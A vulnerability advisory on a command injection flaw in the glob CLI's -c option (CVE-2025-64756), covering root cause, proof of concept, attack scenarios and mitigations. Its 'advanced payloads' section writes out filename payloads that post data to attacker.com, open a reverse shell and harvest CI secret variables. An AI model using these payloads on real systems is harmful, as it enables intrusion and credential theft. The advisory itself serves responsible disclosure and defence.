High | CVSS 7.5 | Command Injection | CVE-2025-64756

Published 2025

glob CLI Command Injection via Filename Shell Metacharacters

BugBunny.ai discovered a high severity command injection vulnerability in the glob CLI where filenames containing shell metacharacters are passed unsanitized to a shell command when using the -c/--cmd option. This enables arbitrary code execution in CI/CD pipelines, developer machines, and automated processing systems.

Responsibly Disclosed

TL;DR

Filenames with shell metacharacters execute as commands

Impact: Arbitrary command execution via crafted filenames
Vector: glob -c <cmd> "**/*" with malicious filenames
Surface: CI/CD, build scripts, file processing pipelines
Status: Fixed in glob v10.5.0, v11.1.0, v12.0.0

Root Cause

The glob CLI's -c/--cmd option passes matched filenames to a child process using shell: true. When filenames contain shell metacharacters like $(...), backticks, or semicolons, the shell interprets them as commands rather than literal strings.

Proof of Concept

# Vulnerable code in glob CLI (src/bin.mts:277)
# Matched filenames passed to shell with shell: true
stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))

# ========== PROOF OF CONCEPT ==========

# 1. Create a file with command injection payload in filename
mkdir test_directory && cd test_directory
touch '$(touch injected_poc)'

# 2. Run glob CLI with -c option
glob -c echo "**/*"

# Result:
# - The echo command executes normally
# - The $(touch injected_poc) in filename is evaluated by shell
# - A new file "injected_poc" is created, proving arbitrary code execution

# ========== ADVANCED PAYLOADS ==========

# Data Exfiltration:
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'

# Reverse Shell:
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'

# Environment Variable Harvesting (CI/CD secrets):
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'

# Attack Scenarios:
# - CI/CD: Malicious PR adds crafted filenames, pipeline runs glob -c
# - Developer: Clone repo with malicious filenames, local build scripts execute
# - Supply Chain: Malicious npm packages include crafted filenames

Attack Scenarios

CI/CD Pipelines: Malicious PR adds crafted filenames. Pipeline runs glob -c during build, executing injected commands with CI credentials.
Supply Chain: Malicious packages include files with crafted names. Build processes using glob CLI automatically execute injected commands.
Automated Processing Systems: Services processing uploaded files or external content with glob CLI. File uploads with malicious names trigger server compromise.

Mitigation

  • Upgrade to glob v10.5.0, v11.1.0, or v12.0.0 immediately
  • If commands fail after upgrade, use --cmd-arg/-g instead of positional arguments
  • Avoid using glob -c on directories containing untrusted content
  • Audit CI/CD pipelines for glob CLI usage on PR-submitted files

Scope Limitation

The core glob library functions (glob(), globSync(), async iterators) are safe. Only the CLI with -c/--cmd option is vulnerable.

Credits & Disclosure

Vulnerability identified by BugBunny.ai and reported through coordinated disclosure. The glob maintainer (@isaacs) promptly addressed the issue with patches in v10.5.0, v11.1.0, and v12.0.0.

Reporter: BugBunny.ai
Advisory: GHSA-5j98-mcp5-4vw2